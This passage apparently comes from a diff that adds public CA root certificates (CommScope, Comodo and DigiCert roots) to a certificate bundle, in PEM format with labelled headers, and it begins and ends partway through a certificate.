+tbq2osS/BqoFjJP7LzAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAd +BgNVHQ4EFgQU4/4t/SjQC7W6tqLEvwaqBYyT+y8wDQYJKoZIhvcNAQELBQADggIB +ACXGumvrh8vegjmWPfBEp2uEcwPenStPuiB/vHiyz5ewG5zz13ku9Ui20vsXiObT +ej/tUxPQ4i9qecsAIyjmHjdXNYmEwnZPNDatZ8POQQaIxffu2Bq41gt/UP+TqhdL +jOztUmCypAbqTuv0axn96/Ua4CUqmtzHQTb3yHQFhDmVOdYLO6Qn+gjYXB74BGBS +ESgoA//vU2YApUo0FmZ8/Qmkrp5nGm9BC2sGE5uPhnEFtC+NiWYzKXZUmhH4J/qy +P5Hgzg0b8zAarb8iXRvTvyUFTeGSGn+ZnzxEk8rUQElsgIfXBDrDMlI1Dlb4pd19 +xIsNER9Tyx6yF7Zod1rg1MvIB671Oi6ON7fQAUtDKXeMOZePglr4UeWJoBjnaH9d +Ci77o0cOPaYjesYBx4/IXr9tgFa+iiS6M+qf4TIRnvHST4D2G0CvOJ4RUHlzEhLN +5mydLIhyPDCBBpEi6lmt2hkuIsKNuYyH4Ga8cyNfIWRjgEj1oDwYPZTISEEdQLpe +/v5WOaHIz16eGWRGENoXkbcFgKyLmZJ956LYBws2J+dIeWCKw9cTXPhyQN9Ky8+Z +AAoACxGV2lZFA4gKn2fQ1XmxqI1AbQ3CekD6819kR5LLU7m7Wc5P/dAVUwHY3+vZ +5nbv0CO7O6l5s9UCKc2Jo5YPSjXnTkLAdc0Hz+Ys63su +-----END CERTIFICATE----- + +# CommScope Public Trust ECC Root-01 +-----BEGIN CERTIFICATE----- +MIICHTCCAaOgAwIBAgIUQ3CCd89NXTTxyq4yLzf39H91oJ4wCgYIKoZIzj0EAwMw +TjELMAkGA1UEBhMCVVMxEjAQBgNVBAoMCUNvbW1TY29wZTErMCkGA1UEAwwiQ29t +bVNjb3BlIFB1YmxpYyBUcnVzdCBFQ0MgUm9vdC0wMTAeFw0yMTA0MjgxNzM1NDNa +Fw00NjA0MjgxNzM1NDJaME4xCzAJBgNVBAYTAlVTMRIwEAYDVQQKDAlDb21tU2Nv +cGUxKzApBgNVBAMMIkNvbW1TY29wZSBQdWJsaWMgVHJ1c3QgRUNDIFJvb3QtMDEw +djAQBgcqhkjOPQIBBgUrgQQAIgNiAARLNumuV16ocNfQj3Rid8NeeqrltqLxeP0C +flfdkXmcbLlSiFS8LwS+uM32ENEp7LXQoMPwiXAZu1FlxUOcw5tjnSCDPgYLpkJE +hRGnSjot6dZoL0hOUysHP029uax3OVejQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYD +VR0PAQH/BAQDAgEGMB0GA1UdDgQWBBSOB2LAUN3GGQYARnQE9/OufXVNMDAKBggq +hkjOPQQDAwNoADBlAjEAnDPfQeMjqEI2Jpc1XHvr20v4qotzVRVcrHgpD7oh2MSg +2NED3W3ROT3Ek2DS43KyAjB8xX6I01D1HiXo+k515liWpDVfG2XqYZpwI7UNo5uS +Um9poIyNStDuiw7LR47QjRE= +-----END CERTIFICATE----- + +# CommScope Public Trust ECC Root-02 +-----BEGIN CERTIFICATE----- +MIICHDCCAaOgAwIBAgIUKP2ZYEFHpgE6yhR7H+/5aAiDXX0wCgYIKoZIzj0EAwMw +TjELMAkGA1UEBhMCVVMxEjAQBgNVBAoMCUNvbW1TY29wZTErMCkGA1UEAwwiQ29t +bVNjb3BlIFB1YmxpYyBUcnVzdCBFQ0MgUm9vdC0wMjAeFw0yMTA0MjgxNzQ0NTRa +Fw00NjA0MjgxNzQ0NTNaME4xCzAJBgNVBAYTAlVTMRIwEAYDVQQKDAlDb21tU2Nv +cGUxKzApBgNVBAMMIkNvbW1TY29wZSBQdWJsaWMgVHJ1c3QgRUNDIFJvb3QtMDIw +djAQBgcqhkjOPQIBBgUrgQQAIgNiAAR4MIHoYx7l63FRD/cHB8o5mXxO1Q/MMDAL +j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU +v4RDsNuESgMjGWdqb8FuvAY5N9GIIvejQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYD +VR0PAQH/BAQDAgEGMB0GA1UdDgQWBBTmGHX/72DehKT1RsfeSlXjMjZ59TAKBggq +hkjOPQQDAwNnADBkAjAmc0l6tqvmSfR9Uj/UQQSugEODZXW5hYA4O9Zv5JOGq4/n +ich/m35rChJVYaoR4HkCMHfoMXGsPHED1oQmHhS48zs73u1Z/GtMMH9ZzkXpc2AV +mkzw5l4lIhVtwodZ0LKOag== +-----END CERTIFICATE----- + +# CommScope Public Trust RSA Root-01 +-----BEGIN CERTIFICATE----- +MIIFbDCCA1SgAwIBAgIUPgNJgXUWdDGOTKvVxZAplsU5EN0wDQYJKoZIhvcNAQEL +BQAwTjELMAkGA1UEBhMCVVMxEjAQBgNVBAoMCUNvbW1TY29wZTErMCkGA1UEAwwi +Q29tbVNjb3BlIFB1YmxpYyBUcnVzdCBSU0EgUm9vdC0wMTAeFw0yMTA0MjgxNjQ1 +NTRaFw00NjA0MjgxNjQ1NTNaME4xCzAJBgNVBAYTAlVTMRIwEAYDVQQKDAlDb21t +U2NvcGUxKzApBgNVBAMMIkNvbW1TY29wZSBQdWJsaWMgVHJ1c3QgUlNBIFJvb3Qt +MDEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCwSGWjDR1C45FtnYSk +YZYSwu3D2iM0GXb26v1VWvZVAVMP8syMl0+5UMuzAURWlv2bKOx7dAvnQmtVzslh +suitQDy6uUEKBU8bJoWPQ7VAtYXR1HHcg0Hz9kXHgKKEUJdGzqAMxGBWBB0HW0al +DrJLpA6lfO741GIDuZNqihS4cPgugkY4Iw50x2tBt9Apo52AsH53k2NC+zSDO3Oj +WiE260f6GBfZumbCk6SP/F2krfxQapWsvCQz0b2If4b19bJzKo98rwjyGpg/qYFl +P8GMicWWMJoKz/TUyDTtnS+8jTiGU+6Xn6myY5QXjQ/cZip8UlF1y5mO6D1cv547 +KI2DAg+pn3LiLCuz3GaXAEDQpFSOm117RTYm1nJD68/A6g3czhLmfTifBSeolz7p +UcZsBSjBAg/pGG3svZwG1KdJ9FQFa2ww8esD1eo9anbCyxooSU1/ZOD6K9pzg4H/ +kQO9lLvkuI6cMmPNn7togbGEW682v3fuHX/3SZtS7NJ3Wn2RnU3COS3kuoL4b/JO +Hg9O5j9ZpSPcPYeoKFgo0fEbNttPxP/hjFtyjMcmAyejOQoBqsCyMWCDIqFPEgkB +Ea801M/XrmLTBQe0MXXgDW1XT2mH+VepuhX2yFJtocucH+X8eKg1mp9BFM6ltM6U +CBwJrVbl2rZJmkrqYxhTnCwuwwIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4G +A1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUN12mmnQywsL5x6YVEFm45P3luG0wDQYJ +KoZIhvcNAQELBQADggIBAK+nz97/4L1CjU3lIpbfaOp9TSp90K09FlxD533Ahuh6 +NWPxzIHIxgvoLlI1pKZJkGNRrDSsBTtXAOnTYtPZKdVUvhwQkZyybf5Z/Xn36lbQ +nmhUQo8mUuJM3y+Xpi/SB5io82BdS5pYV4jvguX6r2yBS5KPQJqTRlnLX3gWsWc+ +QgvfKNmwrZggvkN80V4aCRckjXtdlemrwWCrWxhkgPut4AZ9HcpZuPN4KWfGVh2v +trV0KnahP/t1MJ+UXjulYPPLXAziDslg+MkfFoom3ecnf+slpoq9uC02EJqxWE2a +aE9gVOX2RhOOiKy8IUISrcZKiX2bwdgt6ZYD9KJ0DLwAHb/WNyVntHKLr4W96ioD +j8z7PEQkguIBpQtZtjSNMgsSDesnwv1B10A8ckYpwIzqug/xBpMu95yo9GA+o/E4 +Xo4TwbM6l4c/ksp4qRyv0LAbJh6+cOx69TOY6lz/KwsETkPdY34Op054A5U+1C0w +lREQKC6/oAI+/15Z0wUOlV9TRe9rh9VIzRamloPh37MG88EU26fsHItdkJANclHn +YfkUyq+Dj7+vsQpZXdxc1+SWrVtgHdqul7I52Qb1dgAT+GhMIbA1xNxVssnBQVoc +icCMb3SgazNNtQEo/a2tiRc7ppqEvOuM6sRxJKi6KfkIsidWNTJf6jn7MZrVGczw +-----END CERTIFICATE----- + +# CommScope Public Trust RSA Root-02 +-----BEGIN CERTIFICATE----- +MIIFbDCCA1SgAwIBAgIUVBa/O345lXGN0aoApYYNK496BU4wDQYJKoZIhvcNAQEL +BQAwTjELMAkGA1UEBhMCVVMxEjAQBgNVBAoMCUNvbW1TY29wZTErMCkGA1UEAwwi +Q29tbVNjb3BlIFB1YmxpYyBUcnVzdCBSU0EgUm9vdC0wMjAeFw0yMTA0MjgxNzE2 +NDNaFw00NjA0MjgxNzE2NDJaME4xCzAJBgNVBAYTAlVTMRIwEAYDVQQKDAlDb21t +U2NvcGUxKzApBgNVBAMMIkNvbW1TY29wZSBQdWJsaWMgVHJ1c3QgUlNBIFJvb3Qt +MDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDh+g77aAASyE3VrCLE +NQE7xVTlWXZjpX/rwcRqmL0yjReA61260WI9JSMZNRTpf4mnG2I81lDnNJUDMrG0 +kyI9p+Kx7eZ7Ti6Hmw0zdQreqjXnfuU2mKKuJZ6VszKWpCtYHu8//mI0SFHRtI1C +rWDaSWqVcN3SAOLMV2MCe5bdSZdbkk6V0/nLKR8YSvgBKtJjCW4k6YnS5cciTNxz +hkcAqg2Ijq6FfUrpuzNPDlJwnZXjfG2WWy09X6GDRl224yW4fKcZgBzqZUPckXk2 +LHR88mcGyYnJ27/aaL8j7dxrrSiDeS/sOKUNNwFnJ5rpM9kzXzehxfCrPfp4sOcs +n/Y+n2Dg70jpkEUeBVF4GiwSLFworA2iI540jwXmojPOEXcT1A6kHkIfhs1w/tku +FT0du7jyU1fbzMZ0KZwYszZ1OC4PVKH4kh+Jlk+71O6d6Ts2QrUKOyrUZHk2EOH5 +kQMreyBUzQ0ZGshBMjTRsJnhkB4BQDa1t/qp5Xd1pCKBXbCL5CcSD1SIxtuFdOa3 +wNemKfrb3vOTlycEVS8KbzfFPROvCgCpLIscgSjX74Yxqa7ybrjKaixUR9gqiC6v +wQcQeKwRoi9C8DfF8rhW3Q5iLc4tVn5V8qdE9isy9COoR+jUKgF4z2rDN6ieZdIs +5fq6M8EGRPbmz6UNp2YINIos8wIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4G +A1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUR9DnsSL/nSz12Vdgs7GxcJXvYXowDQYJ +KoZIhvcNAQELBQADggIBAIZpsU0v6Z9PIpNojuQhmaPORVMbc0RTAIFhzTHjCLqB +KCh6krm2qMhDnscTJk3C2OVVnJJdUNjCK9v+5qiXz1I6JMNlZFxHMaNlNRPDk7n3 ++VGXu6TwYofF1gbTl4MgqX67tiHCpQ2EAOHyJxCDut0DgdXdaMNmEMjRdrSzbyme +APnCKfWxkxlSaRosTKCL4BWaMS/TiJVZbuXEs1DIFAhKm4sTg7GkcrI7djNB3Nyq +pgdvHSQSn8h2vS/ZjvQs7rfSOBAkNlEv41xdgSGn2rtO/+YHqP65DSdsu3BaVXoT +6fEqSWnHX4dXTEN5bTpl6TBcQe7rd6VzEojov32u5cSoHw2OHG1QAk8mGEPej1WF +sQs3BWDJVTkSBKEqz3EWnzZRSb9wO55nnPt7eck5HHisd5FUmrh1CoFSl+NmYWvt +PjgelmFV4ZFUjO2MJB+ByRCac5krFk5yAD9UG/iNuovnFNa2RU9g7Jauwy8CTl2d +lklyALKrdVwPaFsdZcJfMw8eD/A7hvWwTruc9+olBdytoptLFwG+Qt81IR2tq670 +v64fG9PiO/yzcnMcmyiQiRM9HcEARwmWmjgb3bHPDcK0RPOWlc4yOo80nOAXx17O +rg3bhzjlP1v9mxnhMUF6cKojawHhRUzNlM47ni3niAIi9G7oyOzWPPO5std3eqx7 +-----END CERTIFICATE----- + +# Comodo AAA Services root +-----BEGIN CERTIFICATE----- +MIIEMjCCAxqgAwIBAgIBATANBgkqhkiG9w0BAQUFADB7MQswCQYDVQQGEwJHQjEb +MBkGA1UECAwSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHDAdTYWxmb3JkMRow +GAYDVQQKDBFDb21vZG8gQ0EgTGltaXRlZDEhMB8GA1UEAwwYQUFBIENlcnRpZmlj +YXRlIFNlcnZpY2VzMB4XDTA0MDEwMTAwMDAwMFoXDTI4MTIzMTIzNTk1OVowezEL +MAkGA1UEBhMCR0IxGzAZBgNVBAgMEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UE +BwwHU2FsZm9yZDEaMBgGA1UECgwRQ29tb2RvIENBIExpbWl0ZWQxITAfBgNVBAMM +GEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczCCASIwDQYJKoZIhvcNAQEBBQADggEP +ADCCAQoCggEBAL5AnfRu4ep2hxxNRUSOvkbIgwadwSr+GB+O5AL686tdUIoWMQua +BtDFcCLNSS1UY8y2bmhGC1Pqy0wkwLxyTurxFa70VJoSCsN6sjNg4tqJVfMiWPPe +3M/vg4aijJRPn2jymJBGhCfHdr/jzDUsi14HZGWCwEiwqJH5YZ92IFCokcdmtet4 +YgNW8IoaE+oxox6gmf049vYnMlhvB/VruPsUK6+3qszWY19zjNoFmag4qMsXeDZR +rOme9Hg6jc8P2ULimAyrL58OAd7vn5lJ8S3frHRNG5i1R8XlKdH5kBjHYpy+g8cm +ez6KJcfA3Z3mNWgQIJ2P2N7Sw4ScDV7oL8kCAwEAAaOBwDCBvTAdBgNVHQ4EFgQU +oBEKIz6W8Qfs4q8p74Klf9AwpLQwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQF +MAMBAf8wewYDVR0fBHQwcjA4oDagNIYyaHR0cDovL2NybC5jb21vZG9jYS5jb20v +QUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNqA0oDKGMGh0dHA6Ly9jcmwuY29t +b2RvLm5ldC9BQUFDZXJ0aWZpY2F0ZVNlcnZpY2VzLmNybDANBgkqhkiG9w0BAQUF +AAOCAQEACFb8AvCb6P+k+tZ7xkSAzk/ExfYAWMymtrwUSWgEdujm7l3sAg9g1o1Q +GE8mTgHj5rCl7r+8dFRBv/38ErjHT1r0iWAFf2C3BUrz9vHCv8S5dIa2LX1rzNLz +Rt0vxuBqw8M0Ayx9lt1awg6nCpnBBYurDC/zXDrPbDdVCYfeU0BsWO/8tqtlbgT2 +G9w84FoVxp7Z8VlIMCFlA2zs6SFz7JsDoeA3raAVGI/6ugLOpyypEBMs1OUIJqsi +l2D4kF501KKaU73yqWjgom7C12yxow+ev+to51byrvLjKzg6CYG1a4XXvi3tPxq3 +smPi9WIsgtRqAEFQ8TmDn5XpNpaYbg== +-----END CERTIFICATE----- + +# COMODO Certification Authority +-----BEGIN CERTIFICATE----- +MIIEHTCCAwWgAwIBAgIQToEtioJl4AsC7j41AkblPTANBgkqhkiG9w0BAQUFADCB +gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G +A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV +BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0wNjEyMDEwMDAw +MDBaFw0yOTEyMzEyMzU5NTlaMIGBMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl +YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P +RE8gQ0EgTGltaXRlZDEnMCUGA1UEAxMeQ09NT0RPIENlcnRpZmljYXRpb24gQXV0 +aG9yaXR5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0ECLi3LjkRv3 +UcEbVASY06m/weaKXTuH+7uIzg3jLz8GlvCiKVCZrts7oVewdFFxze1CkU1B/qnI +2GqGd0S7WWaXUF601CxwRM/aN5VCaTwwxHGzUvAhTaHYujl8HJ6jJJ3ygxaYqhZ8 +Q5sVW7euNJH+1GImGEaaP+vB+fGQV+useg2L23IwambV4EajcNxo2f8ESIl33rXp ++2dtQem8Ob0y2WIC8bGoPW43nOIv4tOiJovGuFVDiOEjPqXSJDlqR6sA1KGzqSX+ +DT+nHbrTUcELpNqsOO9VUCQFZUaTNE8tja3G1CEZ0o7KBWFxB3NH5YoZEr0ETc5O +nKVIrLsm9wIDAQABo4GOMIGLMB0GA1UdDgQWBBQLWOWLxkwVN6RAqTCpIb5HNlpW +/zAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zBJBgNVHR8EQjBAMD6g +PKA6hjhodHRwOi8vY3JsLmNvbW9kb2NhLmNvbS9DT01PRE9DZXJ0aWZpY2F0aW9u +QXV0aG9yaXR5LmNybDANBgkqhkiG9w0BAQUFAAOCAQEAPpiem/Yb6dc5t3iuHXIY +SdOH5EOC6z/JqvWote9VfCFSZfnVDeFs9D6Mk3ORLgLETgdxb8CPOGEIqB6BCsAv +IC9Bi5HcSEW88cbeunZrM8gALTFGTO3nnc+IlP8zwFboJIYmuNg4ON8qa90SzMc/ +RxdMosIGlgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4 +zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd +BA6+C4OmF4O5MBKgxTMVBbkN+8cFduPYSo38NBejxiEovjBFMR7HeL5YYTisO+IB +ZQ== +-----END CERTIFICATE----- + +# COMODO ECC Certification Authority +-----BEGIN CERTIFICATE----- +MIICiTCCAg+gAwIBAgIQH0evqmIAcFBUTAGem2OZKjAKBggqhkjOPQQDAzCBhTEL +MAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UE +BxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxKzApBgNVBAMT +IkNPTU9ETyBFQ0MgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDgwMzA2MDAw +MDAwWhcNMzgwMTE4MjM1OTU5WjCBhTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdy +ZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09N +T0RPIENBIExpbWl0ZWQxKzApBgNVBAMTIkNPTU9ETyBFQ0MgQ2VydGlmaWNhdGlv +biBBdXRob3JpdHkwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQDR3svdcmCFYX7deSR +FtSrYpn1PlILBs5BAH+X4QokPB0BBO490o0JlwzgdeT6+3eKKvUDYEs2ixYjFq0J +cfRK9ChQtP6IHG4/bC8vCVlbpVsLM5niwz2J+Wos77LTBumjQjBAMB0GA1UdDgQW +BBR1cacZSBm8nZ3qQUfflMRId5nTeTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/ +BAUwAwEB/zAKBggqhkjOPQQDAwNoADBlAjEA7wNbeqy3eApyt4jf/7VGFAkK+qDm +fQjGGoe9GKhzvSbKYAydzpmfz1wPMOG+FDHqAjAU9JM8SaczepBGR7NjfRObTrdv +GDeAU/7dIOA1mjbRxwG55tzd8/8dLDoWV9mSOdY= +-----END CERTIFICATE----- + +# COMODO RSA Certification Authority +-----BEGIN CERTIFICATE----- +MIIF2DCCA8CgAwIBAgIQTKr5yttjb+Af907YWwOGnTANBgkqhkiG9w0BAQwFADCB +hTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G +A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxKzApBgNV +BAMTIkNPTU9ETyBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAwMTE5 +MDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBhTELMAkGA1UEBhMCR0IxGzAZBgNVBAgT +EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMR +Q09NT0RPIENBIExpbWl0ZWQxKzApBgNVBAMTIkNPTU9ETyBSU0EgQ2VydGlmaWNh +dGlvbiBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCR +6FSS0gpWsawNJN3Fz0RndJkrN6N9I3AAcbxT38T6KhKPS38QVr2fcHK3YX/JSw8X +pz3jsARh7v8Rl8f0hj4K+j5c+ZPmNHrZFGvnnLOFoIJ6dq9xkNfs/Q36nGz637CC +9BR++b7Epi9Pf5l/tfxnQ3K9DADWietrLNPtj5gcFKt+5eNu/Nio5JIk2kNrYrhV +/erBvGy2i/MOjZrkm2xpmfh4SDBF1a3hDTxFYPwyllEnvGfDyi62a+pGx8cgoLEf +Zd5ICLqkTqnyg0Y3hOvozIFIQ2dOciqbXL1MGyiKXCJ7tKuY2e7gUYPDCUZObT6Z ++pUX2nwzV0E8jVHtC7ZcryxjGt9XyD+86V3Em69FmeKjWiS0uqlWPc9vqv9JWL7w +qP/0uK3pN/u6uPQLOvnoQ0IeidiEyxPx2bvhiWC4jChWrBQdnArncevPDt09qZah +SL0896+1DSJMwBGB7FY79tOi4lu3sgQiUpWAk2nojkxl8ZEDLXB0AuqLZxUpaVIC +u9ffUGpVRr+goyhhf3DQw6KqLCGqR84onAZFdr+CGCe01a60y1Dma/RMhnEw6abf +Fobg2P9A3fvQQoh/ozM6LlweQRGBY84YcWsr7KaKtzFcOmpH4MN5WdYgGq/yapiq +crxXStJLnbsQ/LBMQeXtHT1eKJ2czL+zUdqnR+WEUwIDAQABo0IwQDAdBgNVHQ4E +FgQUu69+Aj36pvE8hI6t7jiY7NkyMtQwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB +/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAArx1UaEt65Ru2yyTUEUAJNMnMvl +wFTPoCWOAvn9sKIN9SCYPBMtrFaisNZ+EZLpLrqeLppysb0ZRGxhNaKatBYSaVqM +4dc+pBroLwP0rmEdEBsqpIt6xf4FpuHA1sj+nq6PK7o9mfjYcwlYRm6mnPTXJ9OV +2jeDchzTc+CiR5kDOF3VSXkAKRzH7JsgHAckaVd4sjn8OoSgtZx8jb8uk2Intzna +FxiuvTwJaP+EmzzV1gsD41eeFPfR60/IvYcjt7ZJQ3mFXLrrkguhxuhoqEwWsRqZ +CuhTLJK7oQkYdQxlqHvLI7cawiiFwxv/0Cti76R7CZGYZ4wUAc1oBmpjIXUDgIiK +boHGhfKppC3n9KUkEEeDys30jXlYsQab5xoq2Z0B15R97QNKyvDb6KkBPvVWmcke +jkk9u+UJueBPSZI9FoJAzMxZxuY67RIuaTxslbH9qh17f4a+Hg4yRvv7E491f0yL +S0Zj/gA0QHDBw7mh3aZw4gSzQbzpgJHqZJx64SIDqZxubw5lT2yHh17zbqD5daWb +QOhTsiedSrnAdyGN/4fy3ryM7xfft0kL0fJuMAsaDk527RH89elWsn2/x20Kk4yl +0MC2Hb46TpSi125sC8KKfPog88Tk5c0NqMuRkrF8hey1FGlmDoLnzc7ILaZRfyHB +NVOFBkpdn627G190 +-----END CERTIFICATE----- + +# DigiCert Assured ID Root CA +-----BEGIN CERTIFICATE----- +MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwOTANBgkqhkiG9w0BAQUFADBl +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv +b3QgQ0EwHhcNMDYxMTEwMDAwMDAwWhcNMzExMTEwMDAwMDAwWjBlMQswCQYDVQQG +EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl +cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwggEi +MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtDhXO5EOAXLGH87dg+XESpa7c +JpSIqvTO9SA5KFhgDPiA2qkVlTJhPLWxKISKityfCgyDF3qPkKyK53lTXDGEKvYP +mDI2dsze3Tyoou9q+yHyUmHfnyDXH+Kx2f4YZNISW1/5WBg1vEfNoTb5a3/UsDg+ +wRvDjDPZ2C8Y/igPs6eD1sNuRMBhNZYW/lmci3Zt1/GiSw0r/wty2p5g0I6QNcZ4 +VYcgoc/lbQrISXwxmDNsIumH0DJaoroTghHtORedmTpyoeb6pNnVFzF1roV9Iq4/ +AUaG9ih5yLHa5FcXxH4cDrC0kqZWs72yl+2qp/C3xag/lRbQ/6GW6whfGHdPAgMB +AAGjYzBhMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBRF66Kv9JLLgjEtUYunpyGd823IDzAfBgNVHSMEGDAWgBRF66Kv9JLLgjEtUYun +pyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEAog683+Lt8ONyc3pklL/3cmbYMuRC +dWKuh+vy1dneVrOfzM4UKLkNl2BcEkxY5NM9g0lFWJc1aRqoR+pWxnmrEthngYTf +fwk8lOa4JiwgvT2zKIn3X/8i4peEH+ll74fg38FnSbNd67IJKusm7Xi+fT8r87cm +NW1fiQG2SVufAQWbqz0lwcy2f8Lxb4bG+mRo64EtlOtCt/qMHt1i8b5QZ7dsvfPx +H2sMNgcWfzd8qVttevESRmCD1ycEvkvOl77DZypoEd+A5wwzZr8TDRRu838fYxAe ++o0bJW1sj6W3YQGx0qMmoRBxna3iw/nDmVG3KwcIzi7mULKn+gpFL6Lw8g== +-----END CERTIFICATE----- + +# DigiCert Assured ID Root G2 +-----BEGIN CERTIFICATE----- +MIIDljCCAn6gAwIBAgIQC5McOtY5Z+pnI7/Dr5r0SzANBgkqhkiG9w0BAQsFADBl +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv +b3QgRzIwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBlMQswCQYDVQQG +EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl +cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgRzIwggEi +MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDZ5ygvUj82ckmIkzTz+GoeMVSA +n61UQbVH35ao1K+ALbkKz3X9iaV9JPrjIgwrvJUXCzO/GU1BBpAAvQxNEP4Htecc +biJVMWWXvdMX0h5i89vqbFCMP4QMls+3ywPgym2hFEwbid3tALBSfK+RbLE4E9Hp +EgjAALAcKxHad3A2m67OeYfcgnDmCXRwVWmvo2ifv922ebPynXApVfSr/5Vh88lA +bx3RvpO704gqu52/clpWcTs/1PPRCv4o76Pu2ZmvA9OPYLfykqGxvYmJHzDNw6Yu +YjOuFgJ3RFrngQo8p0Quebg/BLxcoIfhG69Rjs3sLPr4/m3wOnyqi+RnlTGNAgMB +AAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQW +BBTOw0q5mVXyuNtgv6l+vVa1lzan1jANBgkqhkiG9w0BAQsFAAOCAQEAyqVVjOPI +QW5pJ6d1Ee88hjZv0p3GeDgdaZaikmkuOGybfQTUiaWxMTeKySHMq2zNixya1r9I +0jJmwYrA8y8678Dj1JGG0VDjA9tzd29KOVPt3ibHtX2vK0LRdWLjSisCx1BL4Gni +lmwORGYQRI+tBev4eaymG+g3NJ1TyWGqolKvSnAWhsI6yLETcDbYz+70CjTVW0z9 +B5yiutkBclzzTcHdDrEcDcRjvq30FPuJ7KJBDkzMyFdA0G4Dqs0MjomZmWzwPDCv +ON9vvKO+KSAnq3T/EyJ43pdSVR6DtVQgA+6uwE9W3jfMw3+qBCe703e4YtsXfJwo +IhNzbM8m9Yop5w== +-----END CERTIFICATE----- + +# DigiCert Assured ID Root G3 +-----BEGIN CERTIFICATE----- +MIICRjCCAc2gAwIBAgIQC6Fa+h3foLVJRK/NJKBs7DAKBggqhkjOPQQDAzBlMQsw +CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu +ZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3Qg +RzMwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBlMQswCQYDVQQGEwJV +UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu +Y29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgRzMwdjAQBgcq +hkjOPQIBBgUrgQQAIgNiAAQZ57ysRGXtzbg/WPuNsVepRC0FFfLvC/8QdJ+1YlJf +Zn4f5dwbRXkLzMZTCp2NXQLZqVneAlr2lSoOjThKiknGvMYDOAdfVdp+CW7if17Q 